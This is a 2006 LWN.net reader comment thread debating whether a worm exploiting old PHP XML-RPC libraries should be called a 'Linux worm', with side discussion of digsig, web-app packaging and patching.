LWN.net Logo

Not logged in

Log in now

Create an account

Subscribe to LWN

Recent Features

An "enum" for Python 3

An unexpected perf feature

LWN.net Weekly Edition for May 16, 2013

A look at the PyPy 2.0 release

PostgreSQL 9.3 beta: Federated databases and more

Printable page
Weekly edition Kernel Security Distributions Contact Us Search
Archives Calendar Subscribe Write for LWN LWN.net FAQ Sponsors

A new Linux worm

A new Linux worm

Posted Feb 21, 2006 18:33 UTC (Tue) by xtifr (subscriber, #143)
Parent article: A new Linux worm

Is this actually a "Linux worm"? Or is it merely a worm that affects any system running old versions of PHP XML-RPC and a vulnerable CMS? Wouldn't Windows/AIX/BSD/Solaris/etc. systems be equally affected? The linked reports didn't really make this clear (at least to me).

(Log in to post comments)

A new Linux worm

Posted Feb 21, 2006 19:05 UTC (Tue) by smoogen (subscriber, #97) [Link]

The shell script is Bash and the executable it downloads is Linux only... so in this case if you are running Apache on Windows.. you are home clear.

From what I can tell this variant has been around since Feb 14th. The infected bot boxes do a scan for various vulnerabilities.. and then downloads the worm onto the box. It then executes the worm and listens for commands from the boss-bot.

As always.. your OS is only as good as you can AND will patch it :)

A new Linux worm

Posted Feb 22, 2006 1:40 UTC (Wed) by cventers (subscriber, #31465) [Link]

I wish these malware authors would learn to write portable code so that
we can stop calling PHP security problems "Linux" problems...

:)

A new Linux worm

Posted Feb 22, 2006 9:46 UTC (Wed) by hawk (subscriber, #3195) [Link]

Well, sounds like you're equally exploitable, just that this particular worm isn't compatible with your system.

A new Linux worm

Posted Feb 22, 2006 11:13 UTC (Wed) by nix (subscriber, #2304) [Link]

Oh good, another exploit killed by digsig.

A new Linux worm

Posted Feb 23, 2006 8:58 UTC (Thu) by emj (guest, #14307) [Link]

Digsig is a Linux kernel module, which checks RSA digital signatures of ELF binaries and libraries before they are run.

But if this had been done with just bash scripts, digsig wouldn't be of much help, right?

A new Linux worm

Posted Feb 23, 2006 9:44 UTC (Thu) by nix (subscriber, #2304) [Link]

The webpage is out of date: as of the CVS release (stable as hell despite not being released yet), scripts can be checked too, but it's more annoying (you have to decorate every script you'll run).

A new Linux worm

Posted Feb 22, 2006 9:43 UTC (Wed) by nhippi (subscriber, #34640) [Link]

PHP worm might be more appropriate term. However in this case popular media (like usually) is using "Linux" as synonym of "Open Source systems". Considering the extreme popularity of PHP, it is quite suprising there seems to be very little effort to actually make it secure.

The "PHP is the weak link of LAMP security" aspect is amplified with the fact that most PHP applications are not installed with package managment (apt/yum), and thus do not get security updates via the normal process.

A new Linux worm

Posted Feb 22, 2006 20:47 UTC (Wed) by NightMonkey (subscriber, #23051) [Link]

One of the many reasons I like Gentoo's Portage - web apps are (almost) first-class citizens there. webapp-config, while taking a bit to get used to, allows easy updating of web apps, with similar protection and managed updating of configuration files as in any other application. And it handles virtual hosts!

A new Linux worm

Posted Feb 23, 2006 9:10 UTC (Thu) by tzafrir (subscriber, #11501) [Link]

It is also in Debian and was also true for Mandrake last time I looked over three years ago.

However package managers don't interact well with SQL. And furthermore many of those programs are horribly packaged and are a pain to package correctly: no separation between the basic schema and data and the extra data the user adds.

For instance, have you seen any such sql app where the web app does not have full control over the database?

A new Linux worm

Posted Feb 23, 2006 7:41 UTC (Thu) by job (guest, #670) [Link]

I get why popular media has some interest in making Linux look bad (as it understandably provides less advertising revenue), but I think LWN could have had PHP in the headline instead. It's not a scandals magazine :).

A new Linux worm

Posted Feb 23, 2006 18:58 UTC (Thu) by cventers (subscriber, #31465) [Link]

Agreed. It's kind of like Stallman's gripe with the "Intellectual
Property" propaganda term... using language that confuses the issue
clearly destroys the ability to think clearly.

A new Linux worm

Posted Feb 24, 2006 1:56 UTC (Fri) by roelofs (guest, #2599) [Link]

I get why popular media has some interest in making Linux look bad (as it understandably provides less advertising revenue), but I think LWN could have had PHP in the headline instead. It's not a scandals magazine :).

It's also not prone to misleading/inaccurate titles. Did you overlook smoogen's upstream comment? The article clearly states that one of the binaries is what does the "worm" part (i.e., propagation), and his comment identifies said binaries as Linux ones.

If that's not the exact definition of "Linux worm," I don't know what is.

Greg

A new Linux worm

Posted Feb 26, 2006 14:06 UTC (Sun) by job (guest, #670) [Link]

If it had been a virus I might agree, but this is different. You don't call a Skype worm a "Windows worm" just because it is platform specific. Just like "the sendmail worm" was exactly that.

Posted Apr 25, 2006 5:41 UTC (Tue) by rickmoen (subscriber, #6943) [Link]

roelofs wrote:

It's also not prone to misleading/inaccurate titles. Did you overlook smoogen's upstream comment? The article clearly states that one of the binaries is what does the "worm" part (i.e., propagation), and his comment identifies said binaries as Linux ones. If that's not the exact definition of "Linux worm," I don't know what is.

Greg, the payload of the "Mare.D" worm (which is really just yet another retread of last year's Lupper/ Plupii/Plupii worm) is only incidentally a Linux x86 ELF binary: Without significant change (and, in most cases without change at all), it could be recompiled for Solaris, *BSD, HP/UX, Mac OS X, Win32, etc.

Calling "Mare" (and Lupper) a "Linux worm" suggests that people running with the exact same, identically exploitable PHPXMLRPC vulnerability on other OS platforms need not pay attention. Does that sound reasonable? And would the exact same exploit code, identical except with the payload compiled for Win32, be fairly regarded as a different "worm"?

In a sense, all of this is actually missing the main point: The real problem isn't "worms", which, after all, are merely automated attack tools against known-exploitable vulnerabilities. The real problem is the underlying vulnerabilities. Any sysadmin who's still running known-remotely-exploitable server-app code by the time the "worms" come out -- inevitably months to years later -- is criminally negligent.

Flaws in user applications that handle public content (Web browsers, MUAs, PDF readers, AV players) concern me a great deal more, frankly. They're more likely to be exposed to danger by completely unwary, security-ignorant people -- as opposed to Web site sysadmins.

Rick Moen
rick@linuxmafia.com

A new Linux worm

Posted Mar 6, 2006 12:27 UTC (Mon) by watkin5 (subscriber, #36313) [Link]

Should it not be called a GNU/Linux worm?

Copyright © 2013, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds